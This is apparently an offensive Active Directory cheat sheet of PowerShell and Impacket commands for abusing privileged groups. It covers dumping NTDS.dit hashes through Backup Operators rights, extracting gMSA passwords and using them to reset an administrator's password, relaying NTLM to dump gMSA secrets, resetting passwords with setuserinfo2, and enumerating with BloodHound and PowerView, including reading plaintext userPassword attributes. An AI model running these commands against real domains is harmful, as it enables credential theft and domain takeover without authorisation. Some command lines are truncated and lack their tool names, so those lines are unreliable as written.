Active Directory Enumeration

Privileged groups

AD Recycle Bin

A user in the group is allowed to read / recover deleted AD objects.

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Remote Management Users

Members of this group can access PCs over WinRM

Get-NetGroupMember -Identity "Remote Management Users" -Recurse
Get-NetLocalGroupMember -ComputerName <pc_name> -GroupName "Remote Management Users"

AD Backup Operators

Members of the Backup Operators group can back up and restore all files on a computer, regardless of the permissions that protect those files

# Import libraries
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

# Enable SeBackupPrivilege

Get hashes from .dit file


## Download .dit file (assuming evil-winrm is used)
download <database_file>

## Get system HIVE
reg.exe save hklm\system <destination>

# LOCAL (after file downloads) -system <system_hive> -ntds <database_file> LOCAL


(ReadGMSAPassword abuse) Group Managed Service Accounts (gMSA) are where Windows servers manage the password for an account by generating a long random password for it.

Get password (locally)

This solution is taken from:

# Save the blob to a variable
$gmsa = Get-ADServiceAccount -Identity <user> -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp

# Save the password to variables
(ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword 
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword

# Reset password of admin if the compromised user has GenericAll permissions
$cred = New-Object System.Management.Automation.PSCredential <user>, $SecPass
Invoke-Command -ComputerName -ScriptBlock {Set-ADAccountPassword -Identity <admin_user> -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'PASSWORD' -force)} -Credential $cred

impacket-ntlmrelayx --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://<ip>


/GMSAPasswordReader --AccountName <name>

Interesting account names

AD support accounts

Often we have the credentials belonging limited administrative accounts such as IT, helpdesk or support. Sometimes, these accounts have an ability to reset passwords. Note that the wording of the account name might be different, but related to aforementioned names

setuserinfo2 <user> 23 <password>


BloodHound is used to visualise AD environments and discover attack paths.



Local data collector for BloodHound

Python based data collection tool for BloodHound This will run against the domain, so can one run it from a remote machine.

bloodhound-python -u <username> -p <password> -d <domain> -c All -ns <nameserver_ip>                



# Basic domain info

# Users
## Basic user enabled infos
Get-NetUser -UACFilter NOT_ACCOUNTDISABLE | select samaccountname, description, pwdlastset, logoncount, badpwdcount

# Groups
Get-NetGroup | select samaccountname, admincount, description

# Computers
Get-NetComputer | select samaccountname, operatingsystem
## Find computers with Constrained Delegation
Get-NetComputer -TrustedToAuth | select samaccountname #Find computers with Constrained Delegation
## Find any machine accounts in privileged groups
Get-DomainGroup -AdminCount | Get-DomainGroupMember -Recurse | ?{$_.MemberName -like '*$'}

# Shares
Find-DomainShare -CheckShareAccess

# Check if any user passwords are set
$FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl

# Asks DC for all computers, and asks every computer if it has admin access (very noisy). You need RCP and SMB ports opened.

# Find interesting ACLs
Invoke-ACLScanner -ResolveGUIDs | select IdentityReferenceName, ObjectDN, ActiveDirectoryRights | fl

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